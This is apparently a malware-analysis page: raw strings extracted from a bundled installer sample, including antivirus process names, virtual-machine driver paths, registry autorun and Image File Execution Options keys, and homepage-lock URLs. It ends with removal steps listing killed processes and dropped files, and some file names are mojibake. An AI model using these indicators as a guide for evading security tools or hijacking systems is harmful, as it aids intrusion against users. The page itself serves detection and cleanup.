CreateExecFile fail

KClear::Clean return:%d

WinHttpOpen

WinHttpConnect

WinHttpOpenRequest

WinHttpAddRequestHeaders

WinHttpSendRequest

WinHttpReceiveResponse

WinHttpQueryHeaders

WinHttpReadData

WinHttpCloseHandle

WinHttpCrackUrl

WinHttpSetOption

WinHttpSetTimeouts

FindAV2012:%d

C:\drv.pdb

%s\Connection

e:\KINGSOFT_DUBA\Build\Build_Src\kisengine\kisengine\product\win32\dbginfo\kpacket.pdb

GdiplusShutdown

zcÁ

.?AV?$CWindowImpl@VKNewMsgbox@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@3@@ATL@@

.?AV?$CBkDialogImpl@VKNewMsgbox@@VCBkDialogView@@VCWindow@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@4@@@

.?AVKNewMsgbox@@

.?AV?$KxEIPCClientT@VIKxEServiceMgr@@VKxEPipeClientCommunication@@@@

.?AV?$KxEPipeClientT@VIKxEServiceMgr@@@@

.?AV?$KxEIPCClientT@VIKxEDefendEngineSP_old@@VKxEPipeClientCommunication@@@@

.?AV?$KxEPipeClientT@VIKxEDefendEngineSP_old@@@@

.?AV?$KxEIPCClientT@VIKxEDefendEngineTrustSP@@VKxEPipeClientCommunication@@@@

.?AV?$KxEPipeClientT@VIKxEDefendEngineTrustSP@@@@

.?AV?$KxEIPCClientT@VIKxEDefendEngineSP@@VKxEPipeClientCommunication@@@@

.?AV?$KxEPipeClientT@VIKxEDefendEngineSP@@@@

.?AV?$CAtlHttpClientT@VZEvtSyncSocket@ATL@@@ATL@@

.?AVKInstallStageReport@KDubaPacket@@

.?AVCKANRegisterKey@@

.?AVKWriteHttpFile@@

.?AV?$CWindowImpl@VCBkMsgWnd@@VCWindow@ATL@@V?$CWinTraits@$0GMPAAAA@$0EABAA@@3@@ATL@@

.?AVCBkMsgWnd@@

.?AVIProcessMsgBack@@

.?AVCBkWindowScollBar@@

.?AUICryptoSetPassword@@

.?AVCCryptoGetTextPassword@N7z@NArchive@@

.?AUICryptoGetTextPassword@@

.?AVKImportFileInstallBlock@KDubaPacket@@

.?AVKExecLink@@

.?AVKExecFile@@

.?AVKExecService@@

.?AVKExecProcess@@

.?AVKExecReg@@

.?AVIExec@@

.?AVKWriteMemHttpFile@@

.?AVKUnionInfocReporter@anti_cheat@@

|:S.ww

0eW`%f

%Xr01

4.vsX\

r.dwpt

%x@!X

#iTXtXML:com.adobe.xmp

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:EC4A6183640111E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:EC4A6184640111E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EC4A6181640111E4A977D70A3884CC43" stRef:documentID="xmp.did:EC4A6182640111E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:23845831640211E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:23845832640211E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2384582F640211E4A977D70A3884CC43" stRef:documentID="xmp.did:23845830640211E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>4o

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:1E4476C4640211E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:1E4476C5640211E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E4476C2640211E4A977D70A3884CC43" stRef:documentID="xmp.did:1E4476C3640211E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>9S/

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:1E4476C0640211E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:1E4476C1640211E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1E4476BE640211E4A977D70A3884CC43" stRef:documentID="xmp.did:1E4476BF640211E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:EC4A6187640111E4A977D70A3884CC43" xmpMM:DocumentID="xmp.did:EC4A6188640111E4A977D70A3884CC43"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EC4A6185640111E4A977D70A3884CC43" stRef:documentID="xmp.did:EC4A6186640111E4A977D70A3884CC43"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

<class name="linktext" font="0002" hoverfont="0002" crtext="0033ff" crhover="0066ff" cursor="hand"/>

<class name="cmn_link_2013" crtext="047ecb" crhover="10e6ff" cursor="hand"/>

<!--<class name="menubody" skin="menubody" font="0000" crtext="000000" crbg="FBFCFD" /> -->

<class name="linktext2" hoverfont="0002" crtext="0033ff" crhover="0066ff" cursor="hand"/>

<!-- <class name="normal_path" textmode="4000" font="0000" crtext="ffffff" />-->

<class name="setup_path" textmode="4000" font="0002" hoverfont="0002" crtext="047ecb" crhover="10e6ff" cursor="hand" />

<class name="linktext3" crtext="0070c0" crhover="00b0f0" cursor="hand"/>

<!-- <class name="msgboxhead" skin="msgboxhead" font="0000" crtext="000000" crbg="FBFCFD"/>

<class name="msgboxbody" skin="msgboxbody" font="0000" crtext="000000"/>

<class name="cmn_text_title" font="0004" crtext="FFFFFF"/>

<class name="text_link" font="0002" crtext="0f6ec0" hoverfont="0002" crhover="60cafc" cursor="hand"/>

<class name="text_link_big" font="0102" crtext="0f6ec0" hoverfont="0102" crhover="60cafc" cursor="hand"/>

<class name="common_btn" skin="common_btn" font="0000" crtext="000000" textmode="25" cursor="hand"/>

<class name="big_top_textmode" font="0604" crtext="FBFCFD" />

<class name="cmn_dlg_header" skin="cmn_dlg_header" font="0000" crtext="000000"/>

<class name="cmn_dlg_body" skin="cmn_dlg_body" font="0000" crtext="000000" x-margin="4" />

<class name="cmn_dlg_footer" skin="cmn_dlg_footer" font="0000" crtext="000000" x-margin="4" />

<class name="cmn_head_text_title" font="0004" crtext="FDFDFD"/>

<class name="new_dlg_skinbutton_text" font="0004" crtext="5a5a5a" textmode="25" cursor="hand"/>

<class name="new_msg_text_end" crtext="383838" font="0100" textmode="8028"/>

<class name="skinbutton_text_download" font="0000" crtext="5a5a5a" textmode="25" cursor="hand"/>

<class name="text_link_360" crtext="717273" hoverfont="0002" crhover="60cafc" cursor="hand"/>

<class name="style_btn_360" skin="skinbtn_360" cursor="hand" font="0000" crtext="000000" textmode="25"/>

<class name="link_text_trust_quarant" crtext="0080ff" crhover="00a8e5" cursor="hand" />

<class name="new_skinbutton" skin="new_skinbutton" cursor="hand" font="0000" crtext="5a5a5a" textmode="25"/>

<class name="selpath" crtext="ffffff" textmode="25" font="0000" gdiplus="1" gdipluscalctxt="1"/>

<class name="custom" crtext="403116" font="FF00" hoverfont="FF02" gdiplus="1" gdipluscalctxt="1" cursor="hand" />

<class name="linkpath" textmode="4024" font="0002" hoverfont="0002" crtext="047ecb" crhover="10e6ff" cursor="hand" gdiplus="1" gdipluscalctxt="1"/>

<class name="custom_not_yahei" crtext="403116" textmode="25" font="0100" hoverfont="0102" gdiplus="1" gdipluscalctxt="1" cursor="hand" />

<text id="103" pos="78,28,-28,53" class="new_msg_text_end"></text>

<text id="104" pos="78,40,-28,65" class="new_msg_text_end" show="0"></text>

<check id="103" pos="190,100" crtext="FFFFFF" font="0004" show="0">

<check id="105" pos="190,160" crtext="FFFFFF" font="0004" show="0">

<check id="107" pos="190,120" crtext="FFFFFF" font="0004" show="0">

<text pos="30,5" crtext="ffffff">

<text pos="110,40" crtext="ffffff" font="0704" >

<text pos="43,20" font="0000" crtext="3D3C41">

<text pos="204,17" font="0304" crtext="E86500">

<text id="111" font="0000" pos="314,20" crtext="3D3C41">

<text pos="43,44" crtext="3D3C41">

<text pos="42,83" crtext="3D3C41">360

" skin="blue" id0="hXXp://VVV.ijinshan.com/news/20110511003.shtml" id1="hXXp://finance.qq.com/a/20110426/006595.htm">

<text pos="95,35" crtext="ca561b" font="0904" >

<text id="106" pos="15,30,-0, 50" class="new_msg_text_end"></text>

<text font="0004" pos="0,0" crtext="333333">

<!-- <text pos="30,5" crtext="ffffff">

<text pos="110,38" crtext="ffffff" font="0704" >360

<skinbtn id="202" class="new_skinbutton" crtext="000000" font="0104" pos="278,74">

GetConsoleOutputCP

GetCPInfo

WaitNamedPipeW

GetProcessHeap

GetWindowsDirectoryW

RegQueryInfoKeyW

RegDeleteKeyW

RegEnumKeyExW

RegCreateKeyExW

RegOpenKeyW

RegOpenKeyExW

RegCloseKey

RegOpenKeyExA

RegEnumKeyW

RegEnumKeyExA

SetViewportOrgEx

GetViewportOrgEx

ShellExecuteW

ShellExecuteExW

SHDeleteKeyW

ExitWindowsEx

GetKeyState

.text

`.rdata

@.data

.rsrc

j].UF"

SOFTWARE\Microsoft\Windows\CurrentVersion\Run

{24F8405F-BB3A-455e-B5B3-87220CD2E244}

{AC6822FA-05D6-473b-BAE6-A5C2E0084549}

{826C229B-7EF0-4d33-AA49-D02117D188CA}

78,20,-28,45

-110,-35,-31,-9

%d.%d.%d

ddd

ressrc\chs\uplive.svr

hXXp://ct.duba.net/s/ut/

avp.exe

ffcert.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{560985FB-4B76-4121-9189-7A2CDC7886D6}

avscan.exe

avcenter.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Avira AntiVir Desktop

SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce

kautofix.exe

L%d-%d-%d:%d-%d

%s %s

comctl32.dll

%s\%d.bmp

%s\%d.%s

msyh.ttf

simsun.ttc

SimSun.ttc

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts

msimg32.dll

gdata\skin\skincfg.ini

tuxtheme.dll

%d%%%s

Akscan.exe

kxesapp.exe

kxedefend.exe

kxescore.exe

Global\F626D0A6-A5A1-4719-A80E-A07907F414C1-%s

kxetray.exe

btbg.gif

*.kid

scom.xml

bc.sys

clear_i.xml

%s\%s

\6EED6E3F-BDA6-490e-8F67-6ECDD0697AB2

c:\Program Files

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{052CFB79-9D62-42E3-8A15-DE66C2C97C3E}

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\thunder_is1

Global\48411015-6EB4-4469-8D21-A8A9C8B7FB0D

kpacket_info.dat

service%d

file%d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360SD

uninst.exe

cmd.exe /c "

cmd.exe

https

kxecomm.dat

_sp.xcf

kxebase.dll

x-x-x-xx-xxxxxx

CLSID\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}

Software\Classes\{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}\Implemented Categories\{A5F7140E-4311-4ef9-AABC-F55941B5EBE5}

%d%s%s%s%d%s

%s?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s&mid=%d&dsn=%s&old_svrid=%s

_duba.dat

NextReportTime

LastReportTime

*.ich

index_=%d&count_=%d

kich%d\

union_server0=hXXp://union.infoc.duba.net/nep/v1/

union_server1=hXXp://union.infoc.duba.net/nep/v1/

union_server2=hXXp://union.infoc.duba.net/nep/v1/

union_server%d

helpunion0.ksmobile.com/nep/v1/

.datx

x.dat

system32\DRIVERS\viostor.sys

vmusrvc.exe

system32\DRIVERS\vpcubus.sys

system32\DRIVERS\vpcgbus.sys

system32\DRIVERS\vpc-s3.sys

System32\vpc-s3.dll

P#{ad498944-762f-11d0-8dcb-00c04fc3358c}

ddddddd

hg.dat

QQPCRTP

QQPCTray.exe

%d Byte

%d KB

\\.\PHYSICALDRIVE0

%SYSTEM%

%WINDOWS%

%CUR_DIR%

instSubKeyName

instRootKey

%d-%x-%x-%x.ich

rcmdid

hXXp://did.ijinshan.com/db/

%d-%d-%d %d:%d:%d

data\kunioncfg.dat

\\.\Pipe\

SYSTEM\CurrentControlSet\services\%s

"%s" %s

Psapi.dll

/pid %d /f

taskkill.exe

%s%s_d_%x

\\.\KAVBase

system32\drivers\KAVBase.sys

Kernel32.dll

kavsetup.log

{9B7A98EC-7EF9-468c-ACC8-37C793DBD7E0}

KANSvr.EXE

iexplore.exe

360sd.exe

360rps.exe

kavmenu.dll

ksoft.xml

hXXp://VVV.baidu.com

2012.sp3.0

2012.3.0

LdTermDaemon.exe

\LdTerm.exe

\LdxManager.exe

dinstalltimecfg.dat

%s\%s.lnk

VVV.duba.com

hXXp://VVV.duba.com

%s\kingsoft%x%s

%s\*.*

HTTP/1.1

Host: %s:%d

Content-Length: %d

ChXXp://ct.duba.net/itid

360Safe.exe

360Tray.exe

InstallDK.ini

FileName%d

BakFile:%s, OriFile:%s, ErrCode:%d, DuiKang:%d

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\360

HookPort

ksetupwiz.exe

security\ksde\kisknl64.sys

security\kavbootc64.sys

security\kxescan\kdhacker64.sys

security\kxescan\kdhacker.sys

security\kxescan\bc.sys

ksapi.sys

security\ksde\kisknl.sys

security\kavbootc.sys

\5.png

\4.png

\3.jpg

\2.jpg

\1.jpg

kwstray.exe

kswbc.dll

kwsui.dll

kswebshield.exe

kswebshield.dll

KWSMain.exe

kwssp.dll

data\ghostver.dat

%d:%d:%d:%d:%d

SYSTEM\CurrentControlSet\services\Kingsoft Antivirus WebShield Service

hXXp://did.ijinshan.com/db/?v=2&p=%s&u=%s&m=%s&ip=%d&s=%s

hXXp://infoc0.duba.net/c/

ws2_32.dll

kxetray.exe.manifest

kxescore.exe.manifest

%s_%d

KFixManifest::Delete Folder %s Error(%d)!

KFixManifest::Delete File %s Error(%d)!

setup.xml

{34115DF9-B9DE-49d2-A0B0-AF60FE6EF9D2}

.product.xml

KSafe.exe

KSafeSvc.exe

QQPCMgr.exe

QQPCRTP.exe

TSSysKit.sys

d~%x\

kdrvmgr.exe

uni0nst.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Internet Security

hXXp://VVV.ijinshan.com

URLInfoAbout

kismain.exe

hXXp://download.duba.net/2011/lf/detect360.ini

ksregbackup.reg

hXXp://cu003.VVV.duba.net/duba/tools/dubatools/usb/sysfixkill.exe

hXXp://bbs.duba.net/thread-22796291-1-1.html

Ekingsoft_antivirus_test%d

regedit.exe

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

baidubrowser.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\BaiduBrowser

ntdll.dll

ntoskrnl.exe

okernel32.dll

DHKEY_CURRENT_CONFIG

HKEY_DYN_DATA

HKEY_PERFORMANCE_DATA

{677B9715-5692-49f6-979F-CD11EC963EFE}

kresult.log

{C16A0C4F-108B-4580-A7A0-8DEF25D2E9EF}

Global\{E02A6D98-80B3-4a54-89E3-116EB96D0664}_EXIST

{35CCA0CB-F603-4a28-A436-CF5F47A68DFD}

Doperation\cas\kinfoc.dll

kinfoc.dll

2C14B686-5925-45e2-A3AA-12F87FAE181C

/aurl:

Internet Explorer\iexplore.exe

Advapi32.dll

from=1&ver=0.3&errcode=%d

cmdline

explorer.exe

avrepair.xml

{dda3f824-d8cb-441b-834d-be2efd2c1a33}

SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths

KBigFile.exe

perfopt.exeksafe.exe

netmon.exe

ksafetray.exe

ksafesvc.exe

hXXp://VVV.duba.com/

hXXp://

http:\\

qq.com

.qq.com

123.duba.net

hXXp://VVV.duba.com/?un%s_%s

BaiduPlayerRcmdInstDuba

/lockpage3rd:hXXp://VVV.duba.com/?un%s_%s

PSAPI.DLL

Global\BFD88F2D-0990-4de4-AD0F-764F5894389A-%d

hXXp://bbs.duba.net/thread-22681423-1-1.html

http\shell\open\command

\iexplore.exe

Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice

IE.AssocFile.HTM

Dkavsetup_99_1.exe

hXXp://cd001.VVV.duba.net/duba/install/2013/ever/kavsetup_99_1.exe

hXXp://VVV.ijinshan.com/

{ d d d d }

nTotalScroll=%d, nScolled=%d, bAdd=%d, nChange=%d

dbkmsgwnd

TimerScroll:before:m_bkTimerScroll=%s

TimerScroll:end:m_bkTimerScroll=%s

shoujikong.exe

kphonetray.exe

filemgr.dll

appmgr.dll

data\operation_contact.dat

hXXp://wpa.b.qq.com/cgi/wpa.php?ln=1&key=XzgwMDA0MjEwMF8yMzc1NzlfODAwMDQyMTAwXzJf

liebao.exe

LBBrowser\liebao.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\liebao

InstallExe

%d-%d-%d

hXXp://sighttp.qq.com/authd?IDKEY=4a05d1131c1eec69db5a99c1452ee9869a1af0ced4fc9956

hXXp://bbs.duba.net/thread-22672832-1-1.html

hXXp://VVV.ijinshan.com/protocol/dubaUserLicense.shtml

FhXXp://download.duba.net/2011/lf/duba_uninstall_warn_descript8.xml

hXXp://download.duba.net/2011/lf/duba_uninstall_warn_tip8.png

warntype=%d&click=%d

\ux

Fkvipcore.dll

passport

s%s_d_%x

kisknl64.sys

kisknl.sys

%s\%d-%x-%x-%x.ich

.hXXp://infoc2.duba.net/c/

hXXp://tj.union.ijinshan.com/c/

-unionid=%s

"%s%s" -autorun

%s_%s

RightKeyKillVirusMenu

RightKeyDeleteFileMenu

desktop.ini

d[.ShellClassInfo]

IconFile=kxetray.exe

dscom.dll

dinstall.xml

clear.xml

H\winhttp.dll

HTTP/1.1

\wbem\wuapiget.dll

\wbem\localun.dll

\wbem\keysmgr.dll

\wbem\wuapier.sys

c_999223.dat

%Program Files%\Amd495Sbses53

%Program Files%\Admin704Win

%Program Files%\AdminWin

%Program Files%\AdminLive

%Program Files%\AdminMgr

calcengine.dat

calcengine.dll

\drivers\npfs139.sys

kpopserver.exe

krepair.exe

kabaload.exe

KASMain.exe

KASTask.exe

KAVDX.exe

KAV32.exe

KAVPFW.exe

KAVSetup.exe

KAVStart.exe

killhidepid.exe

KISLnchr.exe

kissvc.exe

KMailMon.exe

KMFilter.exe

KPFWSvc.exe

krnl360svc.exe

KsLoader.exe

KVSrvXP.exe

kvupload.exe

kvwsc.exe

KvXP_1.kxp

KWatch.exe

KWatch9x.exe

KWatchX.exe

KSafeTray.exe

upsvc.exe

kislive.exe

KWSUpd.exe

kwsmain.exe

KSWebShield.exe

uniuwiz.exe

ksmsvc.exe

ksmgui.exe

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

\????????.sys

xxxxxxxx.sys

%System%\drivers\p2phook.sys

%System%\drivers\nthook.sys

%System%\drivers\nhook.sys

%System%\drivers\persist.sys

%System%\uspx.dll

%System%\safemon.dll

%System%\ups.dll

%System%\drivers\beep.sys

A707-22d2-9CBD-0000F87A469H}

%Program Files%\Common Files\Microsoft Shared\INK\

%WinDir%\conime\SSDT01.SYS

\*.sys

%Program Files%\AdminMgr\vmqutr.sys

%Program Files%\AdminMgr\vmqutr.dll

%Program Files%\AdminLive\vbcdtr.sys

%Program Files%\AdminLive\vbcdtr.dll

2345SafeTray.exe

2345Service.exe

deepscan\zhudongfangyu.exe

EfiMon.sys

%Program Files%\360\360Safe\

%Program Files% (x86)\360\360Safe\

%s*.*

%s%s\

ksafe.exe

ksfmon.dll

shoujizhushou.exe

kmobiletray.dll

rstray.exe

rsmain.exe

ravmond.exe

\\.\PhysicalDrive0

\\.\Scsi0

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

D:\dream\duba_u20862342_sv1_3_18.exe

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

taskkill.exe:1876
taskkill.exe:1492
taskkill.exe:1840
taskkill.exe:580
KuaiZip_Setup_union123_0088.exe:552
KZReport.exe:892
net1.exe:1484
ping.exe:468
KuaiZip.exe:856
net.exe:1864
regsvr32.exe:604
regsvr32.exe:1676
regsvr32.exe:628
regsvr32.exe:1460
LockPage.exe:1212
at.exe:1788
at.exe:496
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\data\slimdata.dat (784 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\ErrorMsg.xml (196 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\readme.txt (1 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZReport.exe (7523 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\Uninst.exe (8994 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\7zNew.dat (32 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\SetupHelper.exe (863 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZMount2.exe (3478 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\reportframework.dll (7405 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\sfx\kzSetup_chs.sfx (5506 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\SLDefault.xml (196 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZModule.dll (6778 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZipShell.dll (3047 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\ali\kzshop.ico (1686 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\7z.dll (7131 bytes)
%Documents and Settings%\%current user%\Desktop\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹.lnk (661 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZFormat.dll (2224 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\skin\disopt.skn (3635 bytes)
%System%\wbem\Logs\wbemprox.log (76 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\kuaizipUpdateChecker.dll (393 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\Mount.dll (1686 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\finderlib.dll (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KZ7ZData.7z.MD5 (33 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZip.exe (12581 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\KzNew.dat (74 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\ZipNew.dat (22 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\MountCore.dll (1059 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\my7zData.7z (38588 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\__-________.URL (49 bytes)
%Documents and Settings%\%current user%\Application Data\Kuaizip\report_config.txt (131 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\DiskOpt.exe (4801 bytes)
%Documents and Settings%\%current user%\Start Menu\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹.lnk (661 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\UpdateChecker.exe (4527 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KuaiZipDrive.sys (1137 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\KZTui.exe (4527 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\Update.exe (7758 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\DuiLib.dll (4801 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\ali\jp.png (392 bytes)
%Program Files%\Ã‚Â¿ÃƒÂ¬Ãƒâ€˜Ã‚Â¹\X86\lang\Chs_Lang.dll (1020 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\js1[1] (623688 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1OITCXMZ\bjzy3[1] (147925 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\js2[1] (664204 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\js3[1] (672184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l5qvobehj20c80gbnpk[1].jpg (367545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\6da25678gw1f1l8xa7bhsj20c80gbu12[1].jpg (648672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GLQUASXM\uc2[1] (947341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4N740QDH\uc3[1] (547626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1la7wjwlnj20c80gbnpj[1].jpg (787198 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\uc1[1] (911426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\YB33U3FA\6da25678gw1f1l8knvnatj20c80gbu12[1].jpg (680643 bytes)
